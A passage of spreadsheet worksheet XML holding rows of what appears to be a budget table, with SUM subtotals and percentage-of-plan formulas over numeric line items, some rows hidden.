      <c r="C419" s="100"/>
      <c r="D419" s="100">
        <v>0</v>
      </c>
      <c r="E419" s="173"/>
      <c r="F419" s="174"/>
      <c r="G419" s="172"/>
    </row>
    <row r="420" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A420" s="128" t="s">
        <v>638</v>
      </c>
      <c r="B420" s="100"/>
      <c r="C420" s="100"/>
      <c r="D420" s="100">
        <v>0</v>
      </c>
      <c r="E420" s="173"/>
      <c r="F420" s="174"/>
      <c r="G420" s="172"/>
    </row>
    <row r="421" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A421" s="128" t="s">
        <v>639</v>
      </c>
      <c r="B421" s="100"/>
      <c r="C421" s="100"/>
      <c r="D421" s="100">
        <v>0</v>
      </c>
      <c r="E421" s="173"/>
      <c r="F421" s="174"/>
      <c r="G421" s="172"/>
    </row>
    <row r="422" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A422" s="128" t="s">
        <v>640</v>
      </c>
      <c r="B422" s="100"/>
      <c r="C422" s="100"/>
      <c r="D422" s="100">
        <v>0</v>
      </c>
      <c r="E422" s="173"/>
      <c r="F422" s="174"/>
      <c r="G422" s="172"/>
    </row>
    <row r="423" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A423" s="128" t="s">
        <v>641</v>
      </c>
      <c r="B423" s="100">
        <f>SUM(B424:B428)</f>
        <v>0</v>
      </c>
      <c r="C423" s="100">
        <f>SUM(C424:C428)</f>
        <v>0</v>
      </c>
      <c r="D423" s="100">
        <f>SUM(D424:D428)</f>
        <v>0</v>
      </c>
      <c r="E423" s="173">
        <f>SUM(E424:E428)</f>
        <v>0</v>
      </c>
      <c r="F423" s="174"/>
      <c r="G423" s="172"/>
    </row>
    <row r="424" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A424" s="128" t="s">
        <v>634</v>
      </c>
      <c r="B424" s="100"/>
      <c r="C424" s="100"/>
      <c r="D424" s="100">
        <v>0</v>
      </c>
      <c r="E424" s="173"/>
      <c r="F424" s="174"/>
      <c r="G424" s="172"/>
    </row>
    <row r="425" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A425" s="128" t="s">
        <v>642</v>
      </c>
      <c r="B425" s="100"/>
      <c r="C425" s="100"/>
      <c r="D425" s="100">
        <v>0</v>
      </c>
      <c r="E425" s="173"/>
      <c r="F425" s="174"/>
      <c r="G425" s="172"/>
    </row>
    <row r="426" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A426" s="128" t="s">
        <v>643</v>
      </c>
      <c r="B426" s="100"/>
      <c r="C426" s="100"/>
      <c r="D426" s="100">
        <v>0</v>
      </c>
      <c r="E426" s="173"/>
      <c r="F426" s="174"/>
      <c r="G426" s="172"/>
    </row>
    <row r="427" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A427" s="128" t="s">
        <v>644</v>
      </c>
      <c r="B427" s="100"/>
      <c r="C427" s="100"/>
      <c r="D427" s="100">
        <v>0</v>
      </c>
      <c r="E427" s="173"/>
      <c r="F427" s="174"/>
      <c r="G427" s="172"/>
    </row>
    <row r="428" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A428" s="128" t="s">
        <v>645</v>
      </c>
      <c r="B428" s="100"/>
      <c r="C428" s="100"/>
      <c r="D428" s="100">
        <v>0</v>
      </c>
      <c r="E428" s="173"/>
      <c r="F428" s="174"/>
      <c r="G428" s="172"/>
    </row>
    <row r="429" spans="1:7" ht="17.25" customHeight="1">
      <c r="A429" s="128" t="s">
        <v>646</v>
      </c>
      <c r="B429" s="100">
        <f>SUM(B430:B432)</f>
        <v>2300</v>
      </c>
      <c r="C429" s="100">
        <f>SUM(C430:C432)</f>
        <v>2300</v>
      </c>
      <c r="D429" s="100">
        <f>SUM(D430:D432)</f>
        <v>5000</v>
      </c>
      <c r="E429" s="173">
        <f>SUM(E430:E432)</f>
        <v>5000</v>
      </c>
      <c r="F429" s="174">
        <f aca="true" t="shared" si="29" ref="F429:F434">E429/C429*100</f>
        <v>217.39130434782606</v>
      </c>
      <c r="G429" s="172"/>
    </row>
    <row r="430" spans="1:7" ht="17.25" customHeight="1">
      <c r="A430" s="128" t="s">
        <v>634</v>
      </c>
      <c r="B430" s="100">
        <v>0</v>
      </c>
      <c r="C430" s="100"/>
      <c r="D430" s="100">
        <v>0</v>
      </c>
      <c r="E430" s="173"/>
      <c r="F430" s="174"/>
      <c r="G430" s="172"/>
    </row>
    <row r="431" spans="1:7" ht="17.25" customHeight="1">
      <c r="A431" s="128" t="s">
        <v>647</v>
      </c>
      <c r="B431" s="100">
        <v>0</v>
      </c>
      <c r="C431" s="100"/>
      <c r="D431" s="100">
        <v>0</v>
      </c>
      <c r="E431" s="173"/>
      <c r="F431" s="174"/>
      <c r="G431" s="172"/>
    </row>
    <row r="432" spans="1:7" ht="17.25" customHeight="1">
      <c r="A432" s="128" t="s">
        <v>648</v>
      </c>
      <c r="B432" s="100">
        <v>2300</v>
      </c>
      <c r="C432" s="100">
        <v>2300</v>
      </c>
      <c r="D432" s="100">
        <v>5000</v>
      </c>
      <c r="E432" s="173">
        <v>5000</v>
      </c>
      <c r="F432" s="174">
        <f t="shared" si="29"/>
        <v>217.39130434782606</v>
      </c>
      <c r="G432" s="172" t="s">
        <v>649</v>
      </c>
    </row>
    <row r="433" spans="1:7" ht="17.25" customHeight="1">
      <c r="A433" s="128" t="s">
        <v>650</v>
      </c>
      <c r="B433" s="100">
        <f>SUM(B434:B437)</f>
        <v>89</v>
      </c>
      <c r="C433" s="100">
        <f>SUM(C434:C437)</f>
        <v>89</v>
      </c>
      <c r="D433" s="100">
        <f>SUM(D434:D437)</f>
        <v>97</v>
      </c>
      <c r="E433" s="173">
        <f>SUM(E434:E437)</f>
        <v>97</v>
      </c>
      <c r="F433" s="174">
        <f t="shared" si="29"/>
        <v>108.98876404494382</v>
      </c>
      <c r="G433" s="172"/>
    </row>
    <row r="434" spans="1:7" ht="17.25" customHeight="1">
      <c r="A434" s="128" t="s">
        <v>634</v>
      </c>
      <c r="B434" s="100">
        <v>89</v>
      </c>
      <c r="C434" s="100">
        <v>89</v>
      </c>
      <c r="D434" s="100">
        <v>97</v>
      </c>
      <c r="E434" s="173">
        <v>97</v>
      </c>
      <c r="F434" s="174">
        <f t="shared" si="29"/>
        <v>108.98876404494382</v>
      </c>
      <c r="G434" s="172"/>
    </row>
    <row r="435" spans="1:7" ht="17.25" customHeight="1">
      <c r="A435" s="128" t="s">
        <v>651</v>
      </c>
      <c r="B435" s="100"/>
      <c r="C435" s="100"/>
      <c r="D435" s="100">
        <v>0</v>
      </c>
      <c r="E435" s="173"/>
      <c r="F435" s="174"/>
      <c r="G435" s="172"/>
    </row>
    <row r="436" spans="1:7" ht="17.25" customHeight="1">
      <c r="A436" s="128" t="s">
        <v>652</v>
      </c>
      <c r="B436" s="100"/>
      <c r="C436" s="100"/>
      <c r="D436" s="100">
        <v>0</v>
      </c>
      <c r="E436" s="173"/>
      <c r="F436" s="174"/>
      <c r="G436" s="172"/>
    </row>
    <row r="437" spans="1:7" ht="17.25" customHeight="1">
      <c r="A437" s="128" t="s">
        <v>653</v>
      </c>
      <c r="B437" s="100"/>
      <c r="C437" s="100"/>
      <c r="D437" s="100">
        <v>0</v>
      </c>
      <c r="E437" s="173"/>
      <c r="F437" s="174"/>
      <c r="G437" s="172"/>
    </row>
    <row r="438" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A438" s="128" t="s">
        <v>654</v>
      </c>
      <c r="B438" s="100">
        <f>SUM(B439:B442)</f>
        <v>0</v>
      </c>
      <c r="C438" s="100">
        <f>SUM(C439:C442)</f>
        <v>0</v>
      </c>
      <c r="D438" s="100">
        <f>SUM(D439:D442)</f>
        <v>0</v>
      </c>
      <c r="E438" s="173">
        <f>SUM(E439:E442)</f>
        <v>0</v>
      </c>
      <c r="F438" s="174"/>
      <c r="G438" s="172"/>
    </row>
    <row r="439" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A439" s="128" t="s">
        <v>655</v>
      </c>
      <c r="B439" s="100"/>
      <c r="C439" s="100"/>
      <c r="D439" s="100">
        <v>0</v>
      </c>
      <c r="E439" s="173"/>
      <c r="F439" s="174"/>
      <c r="G439" s="172"/>
    </row>
    <row r="440" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A440" s="128" t="s">
        <v>656</v>
      </c>
      <c r="B440" s="100"/>
      <c r="C440" s="100"/>
      <c r="D440" s="100">
        <v>0</v>
      </c>
      <c r="E440" s="173"/>
      <c r="F440" s="174"/>
      <c r="G440" s="172"/>
    </row>
    <row r="441" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A441" s="128" t="s">
        <v>657</v>
      </c>
      <c r="B441" s="100"/>
      <c r="C441" s="100"/>
      <c r="D441" s="100">
        <v>0</v>
      </c>
      <c r="E441" s="173"/>
      <c r="F441" s="174"/>
      <c r="G441" s="172"/>
    </row>
    <row r="442" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A442" s="128" t="s">
        <v>658</v>
      </c>
      <c r="B442" s="100"/>
      <c r="C442" s="100"/>
      <c r="D442" s="100">
        <v>0</v>
      </c>
      <c r="E442" s="173"/>
      <c r="F442" s="174"/>
      <c r="G442" s="172"/>
    </row>
    <row r="443" spans="1:7" ht="17.25" customHeight="1">
      <c r="A443" s="128" t="s">
        <v>659</v>
      </c>
      <c r="B443" s="100">
        <f>SUM(B444:B449)</f>
        <v>204</v>
      </c>
      <c r="C443" s="100">
        <f>SUM(C444:C449)</f>
        <v>204</v>
      </c>
      <c r="D443" s="100">
        <f>SUM(D444:D449)</f>
        <v>273</v>
      </c>
      <c r="E443" s="173">
        <f>SUM(E444:E449)</f>
        <v>273</v>
      </c>
      <c r="F443" s="174">
        <f aca="true" t="shared" si="30" ref="F443:F445">E443/C443*100</f>
        <v>133.8235294117647</v>
      </c>
      <c r="G443" s="172"/>
    </row>
    <row r="444" spans="1:7" ht="17.25" customHeight="1">
      <c r="A444" s="128" t="s">
        <v>634</v>
      </c>
      <c r="B444" s="100">
        <v>124</v>
      </c>
      <c r="C444" s="100">
        <v>124</v>
      </c>
      <c r="D444" s="100">
        <v>163</v>
      </c>
      <c r="E444" s="173">
        <v>163</v>
      </c>
      <c r="F444" s="174">
        <f t="shared" si="30"/>
        <v>131.4516129032258</v>
      </c>
      <c r="G444" s="172"/>
    </row>
    <row r="445" spans="1:7" ht="17.25" customHeight="1">
      <c r="A445" s="128" t="s">
        <v>660</v>
      </c>
      <c r="B445" s="100">
        <v>80</v>
      </c>
      <c r="C445" s="100">
        <v>80</v>
      </c>
      <c r="D445" s="100">
        <v>80</v>
      </c>
      <c r="E445" s="173">
        <v>80</v>
      </c>
      <c r="F445" s="174">
        <f t="shared" si="30"/>
        <v>100</v>
      </c>
      <c r="G445" s="172"/>
    </row>
    <row r="446" spans="1:7" ht="17.25" customHeight="1">
      <c r="A446" s="128" t="s">
        <v>661</v>
      </c>
      <c r="B446" s="100">
        <v>0</v>
      </c>
      <c r="C446" s="100"/>
      <c r="D446" s="100">
        <v>0</v>
      </c>
      <c r="E446" s="173"/>
      <c r="F446" s="174"/>
      <c r="G446" s="172"/>
    </row>
    <row r="447" spans="1:7" ht="17.25" customHeight="1">
      <c r="A447" s="128" t="s">
        <v>662</v>
      </c>
      <c r="B447" s="100">
        <v>0</v>
      </c>
      <c r="C447" s="100"/>
      <c r="D447" s="100">
        <v>10</v>
      </c>
      <c r="E447" s="173">
        <v>10</v>
      </c>
      <c r="F447" s="174"/>
      <c r="G447" s="172"/>
    </row>
    <row r="448" spans="1:7" ht="17.25" customHeight="1">
      <c r="A448" s="128" t="s">
        <v>663</v>
      </c>
      <c r="B448" s="100">
        <v>0</v>
      </c>
      <c r="C448" s="100"/>
      <c r="D448" s="100">
        <v>0</v>
      </c>
      <c r="E448" s="173"/>
      <c r="F448" s="174"/>
      <c r="G448" s="172"/>
    </row>
    <row r="449" spans="1:7" ht="17.25" customHeight="1">
      <c r="A449" s="128" t="s">
        <v>664</v>
      </c>
      <c r="B449" s="100">
        <v>0</v>
      </c>
      <c r="C449" s="100"/>
      <c r="D449" s="100">
        <v>20</v>
      </c>
      <c r="E449" s="173">
        <v>20</v>
      </c>
      <c r="F449" s="174"/>
      <c r="G449" s="172"/>
    </row>
    <row r="450" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A450" s="128" t="s">
        <v>665</v>
      </c>
      <c r="B450" s="100">
        <f>SUM(B451:B453)</f>
        <v>0</v>
      </c>
      <c r="C450" s="100">
        <f>SUM(C451:C453)</f>
        <v>0</v>
      </c>
      <c r="D450" s="100">
        <f>SUM(D451:D453)</f>
        <v>0</v>
      </c>
      <c r="E450" s="173">
        <f>SUM(E451:E453)</f>
        <v>0</v>
      </c>
      <c r="F450" s="174"/>
      <c r="G450" s="172"/>
    </row>
    <row r="451" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A451" s="128" t="s">
        <v>666</v>
      </c>
      <c r="B451" s="100"/>
      <c r="C451" s="100"/>
      <c r="D451" s="100">
        <v>0</v>
      </c>
      <c r="E451" s="173"/>
      <c r="F451" s="174"/>
      <c r="G451" s="172"/>
    </row>
    <row r="452" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A452" s="128" t="s">
        <v>667</v>
      </c>
      <c r="B452" s="100"/>
      <c r="C452" s="100"/>
      <c r="D452" s="100">
        <v>0</v>
      </c>
      <c r="E452" s="173"/>
      <c r="F452" s="174"/>
      <c r="G452" s="172"/>
    </row>
    <row r="453" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A453" s="128" t="s">
        <v>668</v>
      </c>
      <c r="B453" s="100"/>
      <c r="C453" s="100"/>
      <c r="D453" s="100">
        <v>0</v>
      </c>
      <c r="E453" s="173"/>
      <c r="F453" s="174"/>
      <c r="G453" s="172"/>
    </row>
    <row r="454" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A454" s="128" t="s">
        <v>669</v>
      </c>
      <c r="B454" s="100">
        <f>SUM(B455:B457)</f>
        <v>0</v>
      </c>
      <c r="C454" s="100">
        <f>SUM(C455:C457)</f>
        <v>0</v>
      </c>
      <c r="D454" s="100">
        <f>SUM(D455:D457)</f>
        <v>0</v>
      </c>
      <c r="E454" s="173">
        <f>SUM(E455:E457)</f>
        <v>0</v>
      </c>
      <c r="F454" s="174"/>
      <c r="G454" s="172"/>
    </row>
    <row r="455" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A455" s="128" t="s">
        <v>670</v>
      </c>
      <c r="B455" s="100"/>
      <c r="C455" s="100"/>
      <c r="D455" s="100">
        <v>0</v>
      </c>
      <c r="E455" s="173"/>
      <c r="F455" s="174"/>
      <c r="G455" s="172"/>
    </row>
    <row r="456" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A456" s="128" t="s">
        <v>671</v>
      </c>
      <c r="B456" s="100"/>
      <c r="C456" s="100"/>
      <c r="D456" s="100">
        <v>0</v>
      </c>
      <c r="E456" s="173"/>
      <c r="F456" s="174"/>
      <c r="G456" s="172"/>
    </row>
    <row r="457" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A457" s="128" t="s">
        <v>672</v>
      </c>
      <c r="B457" s="100"/>
      <c r="C457" s="100"/>
      <c r="D457" s="100">
        <v>0</v>
      </c>
      <c r="E457" s="173"/>
      <c r="F457" s="174"/>
      <c r="G457" s="172"/>
    </row>
    <row r="458" spans="1:7" ht="17.25" customHeight="1">
      <c r="A458" s="128" t="s">
        <v>673</v>
      </c>
      <c r="B458" s="100">
        <f>SUM(B459:B462)</f>
        <v>0</v>
      </c>
      <c r="C458" s="100">
        <f>SUM(C459:C462)</f>
        <v>0</v>
      </c>
      <c r="D458" s="100">
        <f>SUM(D459:D462)</f>
        <v>94</v>
      </c>
      <c r="E458" s="173">
        <f>SUM(E459:E462)</f>
        <v>0</v>
      </c>
      <c r="F458" s="174"/>
      <c r="G458" s="172"/>
    </row>
    <row r="459" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A459" s="128" t="s">
        <v>674</v>
      </c>
      <c r="B459" s="100">
        <v>0</v>
      </c>
      <c r="C459" s="100"/>
      <c r="D459" s="100">
        <v>0</v>
      </c>
      <c r="E459" s="173"/>
      <c r="F459" s="174"/>
      <c r="G459" s="172"/>
    </row>
    <row r="460" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A460" s="128" t="s">
        <v>675</v>
      </c>
      <c r="B460" s="100">
        <v>0</v>
      </c>
      <c r="C460" s="100"/>
      <c r="D460" s="100">
        <v>0</v>
      </c>
      <c r="E460" s="173"/>
      <c r="F460" s="174"/>
      <c r="G460" s="172"/>
    </row>
    <row r="461" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A461" s="128" t="s">
        <v>676</v>
      </c>
      <c r="B461" s="100">
        <v>0</v>
      </c>
      <c r="C461" s="100"/>
      <c r="D461" s="100">
        <v>0</v>
      </c>
      <c r="E461" s="173"/>
      <c r="F461" s="174"/>
      <c r="G461" s="172"/>
    </row>
    <row r="462" spans="1:7" ht="17.25" customHeight="1">
      <c r="A462" s="128" t="s">
        <v>677</v>
      </c>
      <c r="B462" s="100"/>
      <c r="C462" s="100"/>
      <c r="D462" s="100">
        <v>94</v>
      </c>
      <c r="E462" s="173"/>
      <c r="F462" s="174"/>
      <c r="G462" s="172"/>
    </row>
    <row r="463" spans="1:7" ht="17.25" customHeight="1">
      <c r="A463" s="128" t="s">
        <v>678</v>
      </c>
      <c r="B463" s="100">
        <f>SUM(B464,B480,B488,B499,B508,B516)</f>
        <v>16651</v>
      </c>
      <c r="C463" s="100">
        <f>SUM(C464,C480,C488,C499,C508,C516)</f>
        <v>13919</v>
      </c>
      <c r="D463" s="100">
        <f>SUM(D464,D480,D488,D499,D508,D516)</f>
        <v>16597</v>
      </c>
      <c r="E463" s="173">
        <f>SUM(E464,E480,E488,E499,E508,E516)</f>
        <v>14285</v>
      </c>
      <c r="F463" s="174">
        <f aca="true" t="shared" si="31" ref="F463:F465">E463/C463*100</f>
        <v>102.62949924563547</v>
      </c>
      <c r="G463" s="172"/>
    </row>
    <row r="464" spans="1:7" ht="17.25" customHeight="1">
      <c r="A464" s="128" t="s">
        <v>679</v>
      </c>
      <c r="B464" s="100">
        <f>SUM(B465:B479)</f>
        <v>2459</v>
      </c>
      <c r="C464" s="100">
        <f>SUM(C465:C479)</f>
        <v>2364</v>
      </c>
      <c r="D464" s="100">
        <f>SUM(D465:D479)</f>
        <v>2316</v>
      </c>
      <c r="E464" s="173">
        <f>SUM(E465:E479)</f>
        <v>2195</v>
      </c>
      <c r="F464" s="174">
        <f t="shared" si="31"/>
        <v>92.85109983079526</v>
      </c>
      <c r="G464" s="172"/>
    </row>
    <row r="465" spans="1:7" ht="17.25" customHeight="1">
      <c r="A465" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B465" s="100">
        <v>888</v>
      </c>
      <c r="C465" s="100">
        <v>888</v>
      </c>
      <c r="D465" s="100">
        <v>756</v>
      </c>
      <c r="E465" s="173">
        <v>756</v>
      </c>
      <c r="F465" s="174">
        <f t="shared" si="31"/>
        <v>85.13513513513513</v>
      </c>
      <c r="G465" s="172"/>
    </row>
    <row r="466" spans="1:7" ht="17.25" customHeight="1">
      <c r="A466" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B466" s="100">
        <v>0</v>
      </c>
      <c r="C466" s="100"/>
      <c r="D466" s="100">
        <v>0</v>
      </c>
      <c r="E466" s="173"/>
      <c r="F466" s="174"/>
      <c r="G466" s="172"/>
    </row>
    <row r="467" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A467" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B467" s="100">
        <v>0</v>
      </c>
      <c r="C467" s="100"/>
      <c r="D467" s="100">
        <v>0</v>
      </c>
      <c r="E467" s="173"/>
      <c r="F467" s="174"/>
      <c r="G467" s="172"/>
    </row>
    <row r="468" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A468" s="128" t="s">
        <v>680</v>
      </c>
      <c r="B468" s="100">
        <v>0</v>
      </c>
      <c r="C468" s="100"/>
      <c r="D468" s="100">
        <v>0</v>
      </c>
      <c r="E468" s="173"/>
      <c r="F468" s="174"/>
      <c r="G468" s="172"/>
    </row>
    <row r="469" spans="1:7" ht="17.25" customHeight="1" hidden="1">
      <c r="A469" s="128" t="s">
        <v>681</v>
      </c>
      <c r="B469" s="100">
        <v>0</v>
      </c>
      <c r="C469" s="100"/>
      <c r="D469" s="100">
        <v>0</v>
      </c>
      <c r="E469" s="173"/>
      <c r="F469" s="174"/>
      <c r="G469" s="172"/>
    </row>
    <row r="470" spans="1:7" ht="17.25" customHeight="1">
      <c r="A470" s="128" t="s">
        <v>682</v>
      </c>
      <c r="B470" s="100">
        <v>6</v>
      </c>
      <c r="C470" s="100">
        <v>6</v>
      </c>
      <c r="D470" s="100">
        <v>6</v>
      </c>
      <c r="E470" s="173">
        <v>6</v>
      </c>
      <c r="F470" s="174">
        <f aca="true" t="shared" si="32" ref="F470:F473">E470/C470*100</f>
        <v>100</v>
      </c>
      <c r="G470" s="172"/>
    </row>
    <row r="471" spans="1:7" ht="17.25" customHeight="1">
      <c r="A471" s="128" t="s">
        <v>683</v>
      </c>
      <c r="B471" s="100">
        <v>613</v>
      </c>
      <c r="C471" s="100">
        <v>613</v>
      </c>
      <c r="D471" s="100">
        <v>617</v>
      </c>
      <c r="E471" s="173">
        <v>617</v>
      </c>
      <c r="F471" s="174">
        <f t="shared" si="32"/>
        <v>100.65252854812398</v>
      </c>
      <c r="G471" s="172"/>
    </row>
    <row r="472" spans="1:7" ht="17.25" customHeight="1">
      <c r="A472" s="128" t="s">
        <v>684</v>
      </c>
      <c r="B472" s="100">
        <v>0</v>
      </c>
      <c r="C472" s="100"/>
      <c r="D472" s="100">
        <v>0</v>
      </c>
      <c r="E472" s="173"/>
      <c r="F472" s="174"/>
      <c r="G472" s="172"/>
    </row>
    <row r="473" spans="1:7" ht="17.25" customHeight="1">
      <c r="A473" s="128" t="s">
        <v>685</v>
      </c>
      <c r="B473" s="100">
        <v>293</v>
      </c>
      <c r="C473" s="100">
        <v>293</v>
      </c>
      <c r="D473" s="100">
        <v>296</v>
      </c>
      <c r="E473" s="173">
        <v>296</v>
      </c>
      <c r="F473" s="174">
        <f t="shared" si="32"/>
        <v>101.02389078498292</v>
      </c>
      <c r="G473" s="172"/>
    </row>
    <row r="474" spans="1:7" ht="17.25" customHeight="1">
      <c r="A474" s="128" t="s">
        <v>686</v>
      </c>
      <c r="B474" s="100">
        <v>0</v>
      </c>
      <c r="C474" s="100"/>
      <c r="D474" s="100">
        <v>0</v>
      </c>
      <c r="E474" s="173"/>
      <c r="F474" s="174"/>
      <c r="G474" s="172"/>
    </row>
    <row r="475" spans="1:7" ht="17.25" customHeight="1">
      <c r="A475" s="128" t="s">
        <v>687</v>
      </c>
      <c r="B475" s="100">
        <v>317</v>
      </c>
      <c r="C475" s="100">
        <v>222</v>
      </c>
      <c r="D475" s="100">
        <v>235</v>
      </c>
      <c r="E475" s="173">
        <v>235</v>
      </c>
      <c r="F475" s="174">
        <f aca="true" t="shared" si="33" ref="F475:F477">E475/C475*100</f>
        <v>105.85585585585586</v>
      </c>
      <c r="G475" s="172"/>
    </row>
    <row r="476" spans="1:7" ht="17.25" customHeight="1">
      <c r="A476" s="128" t="s">
        <v>688</v>
      </c>
      <c r="B476" s="100">
        <v>169</v>
      </c>
      <c r="C476" s="100">
        <v>169</v>
      </c>
      <c r="D476" s="100">
        <v>176</v>
      </c>
      <c r="E476" s="173">
        <v>176</v>
      </c>
      <c r="F476" s="174">
        <f t="shared" si="33"/>
        <v>104.14201183431953</v>
      </c>
      <c r="G476" s="172"/>
    </row>
    <row r="477" spans="1:7" ht="17.25" customHeight="1">
      <c r="A477" s="128" t="s">
        <v>689</v>
      </c>
      <c r="B477" s="100">
        <v>50</v>
      </c>
      <c r="C477" s="100">
        <v>50</v>
      </c>
      <c r="D477" s="100">
        <v>0</v>
      </c>
      <c r="E477" s="173"/>
      <c r="F477" s="174">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="G477" s="172"/>
    </row>
    <row r="478" spans="1:7" ht="17.25" customHeight="1">
      <c r="A478" s="128" t="s">
        <v>690</v>
      </c>
      <c r="B478" s="100">
        <v>0</v>
      </c>
      <c r="C478" s="100"/>
      <c r="D478" s="100">
        <v>0</v>
      </c>
      <c r="E478" s="173"/>
      <c r="F478" s="174"/>
      <c r="G478" s="172"/>
    </row>
    <row r="479" spans="1:7" ht="17.25" customHeight="1">
      <c r="A479" s="128" t="s">
        <v>691</v>
      </c>
      <c r="B479" s="100">
        <v>123</v>
      </c>
      <c r="C479" s="100">
        <v>123</v>
      </c>
      <c r="D479" s="100">
        <v>230</v>
      </c>
      <c r="E479" s="173">
        <v>109</v>
      </c>
      <c r="F479" s="174">
        <f aca="true" t="shared" si="34" ref="F479:F486">E479/C479*100</f>
        <v>88.6178861788618</v>
      </c>
      <c r="G479" s="172"/>
    </row>
    <row r="480" spans="1:7" ht="17.25" customHeight="1">
      <c r="A480" s="128" t="s">
        <v>692</v>
      </c>
      <c r="B480" s="100">
        <f>SUM(B481:B487)</f>
        <v>8187</v>
      </c>
      <c r="C480" s="100">
        <f>SUM(C481:C487)</f>
        <v>6831</v>
      </c>
      <c r="D480" s="100">
        <f>SUM(D481:D487)</f>
        <v>6884</v>
      </c>
      <c r="E480" s="173">
        <f>SUM(E481:E487)</f>
        <v>6698</v>
      </c>
      <c r="F480" s="174">
        <f t="shared" si="34"/>
        <v>98.05299370516762</v>
      </c>
      <c r="G480" s="172"/>
    </row>
    <row r="481" spans="1:7" ht="17.25" customHeight="1">
      <c r="A481" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B481" s="100">
        <v>0</v>
      </c>
      <c r="C481" s="100"/>
      <c r="D481" s="100">
        <v>0</v>
      </c>
      <c r="E481" s="173"/>
      <c r="F481" s="174"/>
      <c r="G481" s="172"/>
    </row>
    <row r="482" spans="1:7" ht="17.25" customHeight="1">
      <c r="A482" s="128" t="s">
        <v>373</v>
      </c>
      <c r="B482" s="100">
        <v>0</v>
      </c>
      <c r="C482" s="100"/>
      <c r="D482" s="100">
        <v>0</v>
      </c>
      <c r="E482" s="173"/>
      <c r="F482" s="174"/>
      <c r="G482" s="172"/>
    </row>
    <row r="483" spans="1:7" ht="17.25" customHeight="1">
      <c r="A483" s="128" t="s">
        <v>374</v>
      </c>
      <c r="B483" s="100">
        <v>0</v>
      </c>
      <c r="C483" s="100"/>
      <c r="D483" s="100">
        <v>0</v>
      </c>
      <c r="E483" s="173"/>
      <c r="F483" s="174"/>
      <c r="G483" s="172"/>
    </row>
    <row r="484" spans="1:7" ht="17.25" customHeight="1">
      <c r="A484" s="128" t="s">
        <v>693</v>
      </c>
      <c r="B484" s="100">
        <v>3303</v>
      </c>
      <c r="C484" s="100">
        <v>1947</v>
      </c>
      <c r="D484" s="100">
        <v>2297</v>
      </c>
      <c r="E484" s="173">
        <v>2111</v>
      </c>
      <c r="F484" s="174">
        <f t="shared" si="34"/>
        <v>108.42321520287621</v>
      </c>
      <c r="G484" s="172"/>
    </row>
    <row r="485" spans="1:7" ht="17.25" customHeight="1">
      <c r="A485" s="128" t="s">
        <v>694</v>
      </c>
      <c r="B485" s="100">
        <v>1402</v>
      </c>
      <c r="C485" s="100">
        <v>1402</v>
      </c>
      <c r="D485" s="100">
        <v>1417</v>
      </c>
      <c r="E485" s="173">
        <v>1417</v>
      </c>
      <c r="F485" s="174">
        <f t="shared" si="34"/>
        <v>101.06990014265335</v>
      </c>
      <c r="G485" s="172"/>
    </row>
    <row r="486" spans="1:7" ht="17.25" customHeight="1">
      <c r="A486" s="128" t="s">
        <v>695</v>
      </c>
      <c r="B486" s="100">
        <v>3482</v>
      </c>
      <c r="C486" s="100">
        <v>3482</v>
      </c>
      <c r="D486" s="100">
        <v>3170</v>
      </c>
      <c r="E486" s="173">
        <v>3170</v>
      </c>
      <c r="F486" s="174">
        <f t="shared" si="34"/>
        <v>91.03963239517519</v>
      </c>
      <c r="G486" s="172"/>
    </row>
    <row r="487" spans="1:7" ht="17.25" customHeight="1">
      <c r="A487" s="128" t="s">
        <v>696</v>
      </c>
      <c r="B487" s="100">
        <v>0</v>
      </c>
      <c r="C487" s="100"/>
      <c r="D487" s="100">
        <v>0</v>
      </c>
      <c r="E487" s="173"/>
      <c r="F487" s="174"/>
      <c r="G487" s="172"/>
    </row>
    <row r="488" spans="1:7" ht="17.25" customHeight="1">
      <c r="A488" s="128" t="s">
        <v>697</v>
      </c>
      <c r="B488" s="100">
        <f>SUM(B489:B498)</f>
        <v>581</v>
      </c>
      <c r="C488" s="100">
        <f>SUM(C489:C498)</f>
        <v>581</v>
      </c>
      <c r="D488" s="100">
        <f>SUM(D489:D498)</f>
        <v>550</v>
      </c>
      <c r="E488" s="173">
        <f>SUM(E489:E498)</f>
        <v>392</v>
      </c>
      <c r="F488" s="174">
        <f aca="true" t="shared" si="35" ref="F488:F492">E488/C488*100</f>
        <v>67.46987951807229</v>
      </c>
      <c r="G488" s="172"/>
    </row>
    <row r="489" spans="1:7" ht="17.25" customHeight="1">
      <c r="A489" s="128" t="s">
        <v>372</v>
      </c>
      <c r="B489" s="100">
        <v>358</v>
      </c>
      <c r="C489" s="100">
        <v>358</v>
      </c>
      <c r="D489" s="100">
        <v>151</v>
      </c>
      <c r="E489" s="173">
        <v>151</v>
      </c>
